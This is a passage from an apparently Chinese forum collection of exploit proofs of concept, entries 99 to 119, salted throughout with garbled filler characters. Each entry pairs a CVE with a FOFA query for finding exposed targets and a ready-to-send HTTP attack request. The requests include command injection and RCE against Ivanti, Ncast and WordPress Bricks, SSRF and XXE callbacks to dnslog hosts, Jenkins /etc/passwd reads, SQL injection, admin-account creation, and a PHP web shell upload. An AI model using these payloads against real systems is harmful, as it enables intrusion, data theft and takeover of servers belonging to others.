/ b8 E6 M+ C2 |: aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
/ C% z1 T+ c+ B# Z o1 Y- O/ CConnection: close8 S' o8 \* M7 ]" J6 j4 l
Content-Length: 121
) Z# |/ J1 H, pAccept: */*0 P$ E- R* [3 Z$ d2 O3 |
Accept-Encoding: gzip, deflate1 Q7 t' b/ s8 ?* w
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 @# R4 H/ `: } A2 F& S& A
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
& D4 @, o& d' N5 b* H5 }0 ~; [X-Requested-With: XMLHttpRequest
& Y: p* \# z) Q. q( s, v6 D F; N9 o/ \& O1 U; d( i0 P
id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
, J/ r. h4 L0 ~" \5 _3 y1 a( n; l3 m: j
" e" q2 v- d) F) S- n2 i! ?% _9 i1 }0 s
99. Ncast盈可视高清智能录播系统busiFacade RCE
0 N- j$ D, l# cCVE-2024-0305 c: |8 S! ?- N U1 }, @
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
. v0 L( {9 v! _7 S: j5 ]" L4 DPOST /classes/common/busiFacade.php HTTP/1.1
% h D w) Z" U4 g# P/ THost: 192.168.40.130:8080# o6 I# d8 ?9 ?+ G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.01 H6 V( \" Y4 K; @7 W. @
Connection: close
3 h7 |3 G% D7 h6 Y& G$ IContent-Length: 154
T/ M9 O) O5 \9 J! j3 `+ w! F+ E5 n) RAccept: */*9 K0 r* [9 B$ g1 C# h$ t d, k$ X$ d1 V/ ~& P
Accept-Encoding: gzip, deflate
) C! j0 h. j9 c9 n% J z HAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. b% s0 _. n* Y" P v
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
& C. r9 U. C8 s, [X-Requested-With: XMLHttpRequest6 }8 C+ i \9 z8 L( h: r
8 [1 u/ U4 \- Y) S
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D6 }. R& z' o) ~7 O7 N
8 v" G2 a9 A1 I* z9 B1 E7 @& u
( [0 V( T/ W2 V1 }' Y100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传& i" @$ |% I9 g% c) a$ F, @+ {! J6 g
CVE-2024-0352
9 J e" W8 ]* J6 iFOFA:icon_hash="874152924"
: n& B J3 }' H& A& aPOST /api/file/formimage HTTP/1.1
: q1 O0 j: p3 p4 o0 P! _Host: 192.168.40.130
* ]! g8 ]3 W: ^9 \9 ]! o2 LUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.360 D# O% {6 {" ]* u4 J2 n8 t2 w
Connection: close3 s% C$ t7 L+ m3 _
Content-Length: 201
% B; [6 d) e" N' f: j, V2 w' R. {Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
% w/ m5 w# M# i' q; |Accept-Encoding: gzip
8 m0 r; N' h# z, p/ i: \; P5 {9 F! Q
------WebKitFormBoundarygcflwtei
# _' ~* ^" c0 X8 c! NContent-Disposition: form-data; name="file";filename="IE4MGP.php"
" _" |0 d* x& f. z5 M; vContent-Type: application/x-php1 `% x. _" ] j. }
_6 ^9 \8 V- W) o8 J
2ayyhRXiAsKXL8olvF5s4qqyI2O
: c4 P3 w4 u# w9 @9 Q. q) [------WebKitFormBoundarygcflwtei--
6 I, @; e& q: O" [2 U1 W8 X* p! K9 }7 R" F
/ K; A; j' I; p% k D+ D6 X
101. ivanti policy secure-22.6命令注入
# O2 G" o% V9 YCVE-2024-21887
, ^( @ k T6 Z8 r4 [! yFOFA:body="welcome.cgi?p=logo"
" F5 U/ d) l! R$ HGET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1- B7 W& ~7 p. v0 w( t6 t
Host: x.x.x.xx.x.x.x6 w! F2 |0 q) I/ L; o
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.362 h+ A7 Q) e1 b
Connection: close! j1 l: j" H& z' W$ W: O1 F+ ]
Accept-Encoding: gzip6 {0 K$ O% p/ x2 S
) G& N1 Y4 \) Q
9 K6 N! y+ b7 C
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行3 M+ e E( H* c- @1 X
CVE-2024-21893
' `) L$ o- @ l% N, ^$ K& ~FOFA:body="welcome.cgi?p=logo"
2 J B; ~& e; Q' A$ g" s. q# S+ i4 QPOST /dana-ws/saml20.ws HTTP/1.1/ P; j: Q3 o! e* H8 h4 E
Host: x.x.x.x
$ c7 ?+ H4 J- k) N: I; o6 U: v: x1 ?$ N) tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
8 F! ]* V! w$ ~" x/ b6 B+ w$ kConnection: close* T; ^7 x1 {2 a' {: Y6 y5 x
Content-Length: 7926 |+ t5 y& N5 {; Z& s
Accept-Encoding: gzip
/ ]; J7 M: r- K- z9 P9 U* c: c, q0 R5 m& p4 L
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>- }: O$ f6 k |6 T
( i5 w3 ~8 n5 u" M5 F
103. Ivanti Pulse Connect Secure VPN XXE; l/ y9 v& F; I
CVE-2024-22024- s. d5 |$ m7 S
FOFA:body="welcome.cgi?p=logo"
( T; z8 r% D5 z. k2 `( YPOST /dana-na/auth/saml-sso.cgi HTTP/1.1
5 H: ^4 `# r9 [- b5 X; uHost: 192.168.40.130:111# l& Y. ^0 T0 C. R v; ^2 f8 \8 T6 |0 j# V
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
3 I5 _7 B' T! n/ b5 s tConnection: close9 \. E: l3 Q& V& G6 Q
Content-Length: 204
* n9 u) d+ y( u2 b0 ?Content-Type: application/x-www-form-urlencoded
2 V7 i9 u1 O7 x2 r; k/ ]( rAccept-Encoding: gzip8 G, U: S) Q$ M+ z8 w. b
+ q" T' U1 k) @3 N" VSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==: L4 I1 Z' c C9 P% R: [' z
2 N5 h7 g: r, E8 B6 M
- V. u, B6 l+ M _. a& b! C W其中SAMLRequest的值是xml文件内容的base64值,xml文件如下$ v# D8 h& R3 L& Y" n2 I, r! J& u
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>9 [ P: B3 {: K/ ?, M
' [! {# ~1 U9 ~( z5 J Q2 F, m& d
4 s% F/ ^: f0 m/ U: A/ W5 N& o+ }104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
. V5 T+ J+ `* E& P# v# E* ?CVE-2024-0569
! i3 h4 T! w0 SFOFA:title="TOTOLINK"
( [+ ~& b- U( e' fPOST /cgi-bin/cstecgi.cgi HTTP/1.1
: m4 M" ~9 N+ CHost:192.168.0.1% l8 @3 r( h& D! C! @% ]
Content-Length:41' x/ r2 s/ K0 ]& u0 J2 C- _
Accept:application/json,text/javascript,*/*;q=0.01
; t* V8 ]# d( R# KX-Requested-with: XMLHttpRequest
" u: M% b5 d$ p$ J7 v1 j0 q0 nUser-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
4 s* `$ w0 h8 g0 oContent-Type: application/x-www-form-urlencoded:charset=UTF-84 n( i1 e# F& D3 F+ n. B8 ]
Origin: http://192.168.0.1; p( N! ^0 b/ H; b1 C
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
& n8 a( o" @, D! XAccept-Encoding:gzip,deflate& L( C4 }+ g$ J b8 f9 w+ l
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7 Q# O' B3 a/ n. n
Connection:close' B# N% [8 N1 Z0 M1 i* V* r Q
, E/ q) ~' S8 J; d+ r) W5 {$ R. \
{2 v: Z2 I; \2 E* W
"topicurl":"getSysStatusCfg",2 ]2 Q2 @8 k/ N1 D) |7 u
"token":""
9 W# P& s- w9 F}
$ P; l4 P, O6 h+ U! f
1 {5 r( U7 p- z; l* w$ e105. SpringBlade v3.2.0 export-user SQL 注入
5 R6 y; g! ]' t, \0 ]- EFOFA:body="https://bladex.vip"
7 E6 O8 v9 t* D* Shttp://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
# k) A. W x4 a2 f3 A& Q: d5 U+ f: h( f
106. SpringBlade dict-biz/list SQL 注入& M1 s8 v" Q3 u; {
FOFA:body="Saber 将不能正常工作"
3 k- a/ }7 h. C3 T: R1 xGET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
7 \# ]3 x% R+ {. a5 W1 NHost: your-ip2 X1 \. `! Y2 i; ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
- L9 B- x- ^% Y# ]Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A/ d) b. D: W- w* t+ Y0 f
Accept-Encoding: gzip, deflate
5 b U; ^' h P: Q6 ?Accept-Language: zh-CN,zh;q=0.9
( J8 w6 V' l4 XConnection: close3 X; N$ s. x* R6 ]$ v' Z& q
1 x8 i5 n! Z6 i1 t2 \1 U/ F9 ~) T ?. R: C+ a u: S/ p* Y. Q
107. SpringBlade tenant/list SQL 注入& M; Y; U& k+ F
FOFA:body="https://bladex.vip"# U, O* b+ Z# s( T
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
6 T; y0 k5 r1 M: n% xHost: your-ip
1 x3 [' \2 D) Q0 [$ Q+ bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.360 k- W* n% K: g; U( \* Q- t
Blade-Auth:替换为自己的2 P( L- U2 f% ~6 K! ^
Connection: close3 w0 a4 L) v: Z/ j- A
, I0 O6 S9 @$ P$ T/ B- g& L" }( c- C% J
108. D-Tale 3.9.0 SSRF \! v/ w# W1 f
CVE-2024-216428 ~1 M3 t" o7 k0 b
FOFA:"dtale/static/images/favicon.png"& Z1 J3 }& u |3 b
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.11 R9 G7 N! s$ P" \
Host: your-ip) n& V+ o5 Q0 u' D/ B
Accept: application/json, text/plain, */*' w- K6 {! n& Z! C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
5 \( z8 O, D, w8 A6 a" U1 e1 _Accept-Encoding: gzip, deflate
8 j$ I6 b& y8 P2 EAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
4 {$ v2 M1 ?5 p- k/ S2 l6 Z" w: GConnection: close
; y* `. w$ z7 V- j0 c
; Z3 K$ Z* N" G- P- `
" y/ a: Q+ i4 i109. Jenkins CLI 任意文件读取1 V$ q2 U$ S7 p
CVE-2024-23897
: [# y) i' o$ I, a6 LFOFA:header="X-Jenkins"5 i1 R' h) \# g0 I& \$ c
POST /cli?remoting=false HTTP/1.1
0 ~7 Z" c/ C' |Host:
; O- Y3 _# o: u: GContent-type: application/octet-stream- i+ K1 q% D! N' m. q! I4 ]" Q
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92, j% {/ e$ |2 d1 t# J9 R t# G
Side: upload
. \2 t O2 O# m6 i9 T% KConnection: keep-alive
" d6 I" A6 A5 E& ?) C1 Q+ P) [7 EContent-Length: 1633 I1 r& @; k; S( T) ^
: q+ F* p Z7 d8 @8 Ib'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
5 {7 h1 q8 ?+ h: h' B$ I/ R1 [9 _; G" l$ A) `7 o! M
4 L6 ~5 t7 D% E( J# n) G
POST /cli?remoting=false HTTP/1.1
5 r! H7 R2 A. U2 x* Q8 G& S$ WHost:* x/ n# m$ @. t
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92% W: Q) f) O& `+ S
download: f! a' n& M T' [
Content-Type: application/x-www-form-urlencoded& t3 ], b/ d8 v! ~8 V
Content-Length: 0
0 b, `& c! Q/ X/ A( g0 I/ k. a, D
, Z$ ` a1 |- ?5 Q8 C! M5 a% B$ H8 b8 r. t
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin9 F2 Y6 z! q: G* W7 G
java -jar jenkins-cli.jar help
; C) v' p7 R S9 i) j[COMMAND]3 W, d/ C. ^( ^8 A
Lists all the available commands or a detailed description of single command.
2 f1 ?0 X, M: j2 M( G, R" x COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
. K4 T: Y- Y/ y9 m& F! W F0 c
3 H2 u% F- i" e. g# o$ y+ q) @, I2 k) I( B1 J3 b% I' a5 F/ H( T
110. Goanywhere MFT 未授权创建管理员/ G7 z5 |$ @: W4 z4 {
CVE-2024-0204
* x: j! E9 Z6 ?& ~- _" x k/ BFOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
- J/ m1 \: T, x" pGET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1# K0 {' ?- Y& y) P7 M0 U
Host: 192.168.40.130:8000
7 v/ E7 ~1 R% \( [7 QUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.361 l) k8 J0 g- g
Connection: close
2 n( T. H% P& ~ U1 e dAccept: */*
9 E2 f: k: Q* cAccept-Language: en/ k/ B; N0 _, X0 A
Accept-Encoding: gzip! l6 |! g7 A: T
$ b8 G; c; g' G- p1 ]+ O% l& q
0 |% Z2 t% U, P8 f0 L+ Z111. WordPress Plugin HTML5 Video Player SQL注入
: D& f/ O) o% @3 XCVE-2024-1061
, B% @; D0 q/ B/ X. V$ `. `; ]FOFA:"wordpress" && body="html5-video-player"
. n& i3 a& P3 ^# zGET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.17 E# M6 d% d7 f
Host: 192.168.40.130:112
5 i1 ?. f. b9 bUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36" P8 Q" Z3 e" a0 \
Connection: close8 x7 F) d& ?. B) l
Accept: */*2 i- j- w1 K. n9 P! i# U. J1 K9 f
Accept-Language: en
0 ?1 G A& a5 s4 I7 t SAccept-Encoding: gzip+ q9 P9 D; z# w2 d: c3 x* a% C# m# R
; [0 v" G! X4 c$ g/ R( C+ u; N8 _$ a: c7 ^ s
112. WordPress Plugin NotificationX SQL 注入
/ q0 V6 V$ M# e! X7 g6 E& vCVE-2024-1698
# |, V* q2 E8 Q( SFOFA:body="/wp-content/plugins/notificationx"
# M7 v5 Z2 z( T* CPOST /wp-json/notificationx/v1/analytics HTTP/1.1
3 U+ e' V K2 j! M S' HHost: {{Hostname}}
# P( r+ j) L1 [5 t* x3 BContent-Type: application/json
% f- n5 c% t! T- N! |6 e
; _/ v; y- ~; _$ M- s{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}3 K# n8 A% x' i$ f5 P4 X
, R* C, ^9 Z/ o6 Z
: Z6 k9 _3 u; z2 R113. WordPress Automatic 插件任意文件下载和SSRF [; {% A0 o- ]+ n. _- d
CVE-2024-279543 R( Q6 ~- v# C
FOFA:"/wp-content/plugins/wp-automatic"+ W- v, ?* y/ Q8 R% ]
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
2 b/ ^9 Z& E. F' y) W6 sHost: x.x.x.x. e- k+ T1 ?3 X
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36; w8 y( I0 V( k# \/ k
Connection: close
* n! |8 p! R7 T" B2 ]Accept: */*
# A% }' n9 [+ |$ Z, eAccept-Language: en# ]0 l9 M# ?4 X. t& q
Accept-Encoding: gzip. C8 A. Z% @. o0 b2 K% L
4 L* C" G% r7 I% _( J% t
! J8 [$ k/ U7 v5 Z: S( q& E8 x114. WordPress MasterStudy LMS插件 SQL注入
5 P1 m9 X3 i: L" X: C2 F1 M5 q1 U4 K; bFOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"4 i- Q' x7 T4 P5 s) [9 v7 F
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1, o* L: ]' F, V( G/ u; S. e9 l7 B
Host: your-ip
) H& x0 Z+ m/ m7 z }User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
6 a, p+ W Y9 F# |3 K0 y8 G* eAccept-Charset: utf-8
5 F3 [% K g7 w! ~4 OAccept-Encoding: gzip, deflate
0 ~5 p1 u; m/ [" ?. ]! ~Connection: close
5 v$ }+ n! {' z: V( w$ D% o4 R! ^
+ t; q' e6 [' L3 c% e/ {! K: q
115. WordPress Bricks Builder <= 1.9.6 RCE
1 ~5 R/ L }0 F* ?- lCVE-2024-25600: t) X- _, \0 M* B% [9 v2 [
FOFA: body="/wp-content/themes/bricks/"- O4 e. I0 N* A3 d
第一步,获取网站的nonce值; Q5 ~. u. \& b2 B: ]
GET / HTTP/1.1
, g" k" r# w+ U8 I7 l* F- j7 T& ^, WHost: x.x.x.x3 f! d$ b* n. O i# h
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36+ H3 I F- a- S' t
Connection: close
4 I0 \- q/ Z: P$ |. hAccept-Encoding: gzip
* H. W( H" K) A& ]: B% Z9 e* {& C/ J6 F
, ]' Z7 ]* I) m+ ?0 P+ W第二步替换nonce值,执行命令( c& ~0 C7 R& k; i9 j8 l* X6 |% h4 G
POST /wp-json/bricks/v1/render_element HTTP/1.1
' ^# m M! e2 `' N6 f4 rHost: x.x.x.x0 @7 P9 U3 x0 ~( X$ o: X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
1 ^2 X( I1 m( P6 ^- PConnection: close
! Y# y, z4 h! S5 JContent-Length: 356
/ [2 q7 m) {& V1 i- fContent-Type: application/json, B _. Q# r* H
Accept-Encoding: gzip
- ]3 \7 M+ w. B8 a+ g- S3 |, ^5 q2 j( u9 z! {
{
7 O7 C; z" g$ B5 c7 [0 {* j! _) m"postId": "1",
, U& B+ [2 j7 L: Y& D "nonce": "第一步获得的值",2 U/ R1 \1 o2 {1 _+ d4 M
"element": {4 Q0 t$ M6 |( H) O% A. I
"name": "container",# c$ h2 d! @6 k% ^* T
"settings": {9 }8 S# D+ g/ t) Y: c
"hasLoop": "true",
% A: X5 g5 e" j! m "query": {# i( C( N6 E3 [$ N) D
"useQueryEditor": true,
1 U0 a* a0 ]$ _; N2 v "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
3 X8 y/ w( H4 z' s: h "objectType": "post"
. P* _+ w/ l: [0 r }
) a5 k( Y4 G( E) L) G* _9 W }. z- R3 u- V8 b2 k" h1 K
}
& g/ B" B4 Z5 f# P7 I, G} G i! P# V3 t0 ^
. X/ ]- T# f' \" _& N2 m3 m
: C0 s. q" C) ^- X4 h9 A116. wordpress js-support-ticket文件上传
. T% g. H# k }1 m: }2 ` H$ rFOFA:body="wp-content/plugins/js-support-ticket"- O: R$ _8 g7 A. }0 T& _4 {0 z
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
& [- Y" v- x/ J9 J! F- pHost:
{9 R- T4 G" E7 P% H4 lContent-Type: multipart/form-data; boundary=--------767099171
$ c$ S/ ^4 ?0 h7 |4 OUser-Agent: Mozilla/5.0
5 i- z) l' e$ S. `6 w; P
+ b. A8 E$ X- J0 X# O8 t- J% ~----------767099171
, [7 Q: N( ~4 yContent-Disposition: form-data; name="action"+ y0 z1 z8 B T
configuration_saveconfiguration
/ A6 e! i1 y% M----------767099171
5 l1 J0 b+ @: J0 iContent-Disposition: form-data; name="form_request"* z6 }6 x" y @2 x. i% V9 m$ I! d
jssupportticket$ H3 Y. c) C7 c
----------767099171! H- E# K0 R2 c2 a$ }% m5 P
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
: u j/ P# N: |& L# w! _5 v$ YContent-Type: image/png
8 M5 K5 U* c8 N! t/ q----------767099171--
' {; H) p: _& [0 n6 b$ Z& R7 V9 H
% d4 c5 _9 Q" ~
$ i% c# q2 h% Y% ~$ h: l117. WordPress LayerSlider插件SQL注入
0 x3 S( J# j0 R5 z% ~3 s) y+ k" ]version:7.9.11 – 7.10.02 J, c$ z0 ~- k0 b, b; l, m3 i& T
FOFA:body="/wp-content/plugins/LayerSlider/"4 f9 s. A# O G2 u" ^4 g5 u
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
# d# B, ~4 Y" x- e YHost: your-ip- ?9 Q S) D( c9 g, y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
}) N) c8 f+ CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
% M0 ^0 B% L8 I5 p2 dAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& T+ Z" t# X% c' j
Accept-Encoding: gzip, deflate, br: |3 p2 ^& k& b' g5 j0 `( k
Connection: close
! Y6 {1 i, P1 LUpgrade-Insecure-Requests: 1( A6 J& U1 A; \3 y
3 J) e3 J4 ~/ L( L6 r+ X9 s) I7 l/ E7 H( y
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传. ?: s& O: f) \' `/ {& E
CVE-2024-0939& a) t; S) Y N2 B6 b
FOFA:title="Smart管理平台"8 |+ V* D8 D5 u% d2 X
POST /Tool/uploadfile.php? HTTP/1.1
( a# r g$ B, aHost: 192.168.40.130:8443
" u* s$ W M; tCookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8) Q x1 Y; X4 ^8 a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
/ n+ @0 e% ^# s9 BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.82 V4 ?0 e) c6 ]4 ]+ {3 \: [9 O
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 Y' }# |) h4 i1 \# \4 U% K* w0 t- aAccept-Encoding: gzip, deflate
3 `. K) e: p Z$ lContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
8 [' e( n$ v* T, R! FContent-Length: 4059 r0 ]/ e. w6 u9 a% s
Origin: https://192.168.40.130:8443
t+ V# |" J1 \3 ]; G3 `Referer: https://192.168.40.130:8443/Tool/uploadfile.php( p, F3 t" ~, g$ I; r8 F5 q; H9 H
Upgrade-Insecure-Requests: 1
4 a& @* S0 \- C: o/ g8 DSec-Fetch-Dest: document3 _3 r0 S _3 D4 f
Sec-Fetch-Mode: navigate
( J# G, y$ p3 N s; h u. B% PSec-Fetch-Site: same-origin) g( S) n9 W! T H! R! S# Z& a
Sec-Fetch-User: ?1
& [9 n# @9 j* ?9 w0 bTe: trailers
4 `% Z& O2 B& O( B" kConnection: close8 o1 U v% l6 d1 e7 b2 p
6 n. R- [$ \4 k6 R8 f" D! |: U-----------------------------13979701222747646634037182887 u ]' X3 ?! G6 m7 V
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
0 S: [/ L" S1 G2 m5 sContent-Type: application/octet-stream* p) ~/ B6 B5 J" Q/ [. F; S4 {8 z
: n# o( T% c& S$ g6 ?6 Y<?php" o4 d% \9 w3 U# V
system($_POST["passwd"]);
6 J! c' f; y# g+ ^. i0 p) i?>6 g5 U: }4 p" r
-----------------------------13979701222747646634037182887
0 w- E* R4 W0 aContent-Disposition: form-data; name="txt_path"
. X3 q3 U! I. ~3 d/ c
$ G9 @4 P1 @( Z6 E5 F/home/src.php
' A9 c9 U9 x1 ?: O5 T-----------------------------13979701222747646634037182887--
6 d/ R. U4 z$ u( u/ y7 } r0 J* x
- ]) y# ~1 ~; f% B
& G: {$ B- a% M9 K$ P5 v访问/home/src.php
! N6 N( w4 Y1 d: R" Q# m6 A1 z& z
9 A% f6 M' l; X4 R# _2 H119. 北京百绰智能S20后台sysmanageajax.php sql注入
4 X# y( d0 ]- J6 h# PCVE-2024-1254, E( D, ]" |) _. r
FOFA:title="Smart管理平台"3 s) |$ v4 q b6 k# R
先登录进入系统,默认账号密码为admin/admin
8 v, P* n9 n7 h" t( \POST /sysmanage/sysmanageajax.php HTTP/1.11
* y* P1 Z- } r6 O/ X5 m8 q6 N/ G6 PHost: x.x.x.x
# S7 ?! k: a( [& O( N, w6 G2 Y- \Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
R3 J( D: m% h$ V8 I5 M' l9 OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.05 i- b7 v+ n/ o% d
Accept: */*' ?% j, ^, T9 [# | [1 A4 A4 C
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 C+ d% Y; F% Y* v( U- BAccept-Encoding: gzip, deflate
1 c- r% D+ y; ?Content-Type: application/x-www-form-urlencoded;* r: l, R+ J* r) l
Content-Length: 1099 U7 |3 N! d3 O$ b: A) c9 I2 J
Origin: https://58.18.133.60:8443
* b6 \/ ]- a6 P# @$ G8 @! cReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php
8 `, E% H! T: W. GSec-Fetch-Dest: empty4 h. ~% O8 q/ m& M
Sec-Fetch-Mode: cors
% L) F" `0 g6 `" [1 P$ b/ @5 lSec-Fetch-Site: same-origin9 Y9 r3 s" S0 S1 l% R
